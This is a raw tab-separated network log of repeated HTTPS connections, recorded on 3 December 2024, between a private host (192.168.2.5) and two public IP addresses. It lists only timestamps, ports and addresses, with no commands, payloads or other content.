Dec 3, 2024 17:24:45.932368040 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:45.934695959 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:45.979331970 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:46.747484922 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:46.748508930 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:46.748526096 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:46.748583078 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:46.748620987 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:46.748656988 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:46.748667955 CET	443	49883	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:46.748682976 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:46.748723030 CET	49883	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:46.906913042 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:46.906966925 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:46.907043934 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:46.907392025 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:46.907413960 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:48.698415041 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:48.698573112 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:48.703872919 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:48.703885078 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:48.704128027 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:48.704180956 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:48.704585075 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:48.751322031 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:49.692085028 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:49.692178965 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:49.692219019 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:49.692234993 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:49.692256927 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:49.692301035 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:49.692779064 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:49.692826033 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:49.692888021 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:49.701271057 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:49.701284885 CET	443	49891	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:49.701293945 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:49.701361895 CET	49891	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:49.809847116 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:49.809889078 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:49.809993029 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:49.810292959 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:49.810307026 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:51.550594091 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:51.550700903 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:51.551343918 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:51.551353931 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:51.551584005 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:51.551589966 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:52.471201897 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:52.471297026 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:52.471324921 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:52.471371889 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:52.475883961 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:52.475930929 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:52.475949049 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:52.475969076 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:52.494946003 CET	49898	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:52.494959116 CET	443	49898	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:52.511003971 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:52.511018038 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:52.511111975 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:52.515253067 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:52.515264988 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:54.313169956 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:54.313293934 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:54.313927889 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:54.313935041 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:54.314126015 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:54.314130068 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:55.251717091 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:55.251789093 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:55.251792908 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:55.251826048 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:55.251864910 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:55.251873016 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:55.251888037 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:55.251925945 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:55.251945972 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:55.256858110 CET	49905	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:55.256871939 CET	443	49905	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:55.576154947 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:55.576189995 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:55.576250076 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:55.576734066 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:55.576744080 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:57.357495070 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:57.357561111 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:57.357954025 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:57.357960939 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:57.358155012 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:57.358160019 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:58.278208017 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:58.278301001 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:58.278317928 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:58.278364897 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:58.278476000 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:58.278507948 CET	443	49912	172.217.19.174	192.168.2.5
Dec 3, 2024 17:24:58.278559923 CET	49912	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:24:58.289675951 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:58.289709091 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:24:58.289781094 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:58.290045977 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:24:58.290060043 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:00.117048979 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:00.117214918 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:00.117692947 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:00.117707014 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:00.117902994 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:00.117908001 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:01.130337000 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:01.130418062 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:01.130556107 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:01.130556107 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:01.130578995 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:01.130618095 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:01.130772114 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:01.130815983 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:01.130825043 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:01.130876064 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:01.131386042 CET	49918	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:01.131396055 CET	443	49918	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:01.247220993 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:01.247260094 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:01.247472048 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:01.247644901 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:01.247659922 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:02.942171097 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:02.942255020 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:02.942934990 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:02.942992926 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:02.945074081 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:02.945082903 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:02.945386887 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:02.945442915 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:02.945879936 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:02.987329006 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:04.003504992 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:04.003596067 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:04.003631115 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:04.003694057 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:04.003803015 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:04.003820896 CET	443	49922	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:04.003830910 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:04.003874063 CET	49922	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:04.017652988 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:04.017688036 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:04.017777920 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:04.018100977 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:04.018114090 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:05.757110119 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:05.757186890 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:05.757610083 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:05.757622957 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:05.757832050 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:05.757837057 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:06.698441982 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:06.698498964 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:06.698518991 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:06.698532104 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:06.698569059 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:06.698590040 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:06.699184895 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:06.699229956 CET	443	49926	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:06.699294090 CET	49926	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:06.825289965 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:06.825306892 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:06.825396061 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:06.825737953 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:06.825750113 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:08.674726009 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:08.674853086 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:08.737535000 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:08.737564087 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:08.738019943 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:08.738030910 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:09.600847960 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:09.600936890 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:09.601010084 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:09.601043940 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:09.601238012 CET	49931	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:09.601259947 CET	443	49931	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:09.623677015 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:09.623722076 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:09.623792887 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:09.624265909 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:09.624280930 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:11.367000103 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:11.367106915 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:11.370651007 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:11.370663881 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:11.370968103 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:11.371061087 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:11.371406078 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:11.419334888 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:12.316572905 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:12.316627979 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:12.316757917 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:12.316792011 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:12.316869974 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:12.317734003 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:12.317785978 CET	443	49937	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:12.317852020 CET	49937	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:12.438266993 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:12.438308954 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:12.438384056 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:12.438934088 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:12.438941956 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:14.258006096 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:14.258094072 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:14.258601904 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:14.258614063 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:14.258831024 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:14.258836031 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:15.228966951 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:15.229052067 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:15.229067087 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:15.229120016 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:15.229264021 CET	49943	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:15.229293108 CET	443	49943	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:15.242547035 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:15.242604971 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:15.242683887 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:15.243024111 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:15.243038893 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:17.082640886 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:17.082747936 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:17.084700108 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:17.084707975 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:17.085035086 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:17.085093975 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:17.085455894 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:17.127340078 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:18.056744099 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:18.056793928 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:18.056946039 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:18.056974888 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:18.057035923 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:18.058288097 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:18.058434963 CET	443	49950	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:18.058505058 CET	49950	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:18.191584110 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:18.191658974 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:18.191895008 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:18.192493916 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:18.192507982 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:19.982866049 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:19.982985973 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:19.983589888 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:19.983608961 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:19.983823061 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:19.983831882 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:20.905268908 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:20.905349016 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:20.905419111 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:20.905476093 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:20.905730009 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:20.905771971 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:20.905791998 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:20.905826092 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:21.056385994 CET	49951	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:21.056427956 CET	443	49951	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:21.077001095 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:21.077055931 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:21.077124119 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:21.087718010 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:21.087750912 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:22.896373987 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:22.896518946 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:22.898407936 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:22.898428917 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:22.898669004 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:22.898736000 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:22.899132013 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:22.943330050 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:23.843447924 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:23.843533039 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:23.843591928 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:23.843612909 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:23.843636036 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:23.843661070 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:23.844430923 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:23.844485044 CET	443	49952	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:23.844557047 CET	49952	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:23.966140985 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:23.966192961 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:23.966310978 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:23.966730118 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:23.966744900 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:25.791896105 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:25.792026997 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:25.792932987 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:25.792944908 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:25.793224096 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:25.793229103 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:26.781649113 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:26.781707048 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:26.781718016 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:26.781763077 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:26.781891108 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:26.781925917 CET	443	49953	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:26.781976938 CET	49953	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:26.796243906 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:26.796298981 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:26.796375036 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:26.796760082 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:26.796772003 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:28.588141918 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:28.588284969 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:28.590398073 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:28.590409994 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:28.590660095 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:28.590723038 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:28.591105938 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:28.631337881 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:29.553216934 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:29.553340912 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:29.553371906 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:29.553416014 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:29.554701090 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:29.554784060 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:29.554883957 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:29.554919958 CET	443	49954	142.250.181.33	192.168.2.5
Dec 3, 2024 17:25:29.554979086 CET	49954	443	192.168.2.5	142.250.181.33
Dec 3, 2024 17:25:29.669306993 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:29.669358969 CET	443	49955	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:29.669452906 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:29.669811964 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:29.669823885 CET	443	49955	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:31.418302059 CET	443	49955	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:31.418390036 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:31.419079065 CET	443	49955	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:31.419137955 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:31.420703888 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:31.420717001 CET	443	49955	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:31.420960903 CET	443	49955	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:31.421020031 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:31.421390057 CET	49955	443	192.168.2.5	172.217.19.174
Dec 3, 2024 17:25:31.467329025 CET	443	49955	172.217.19.174	192.168.2.5
Dec 3, 2024 17:25:32.382214069 CET	443	49955	172.217.19.174	192.168.2.5
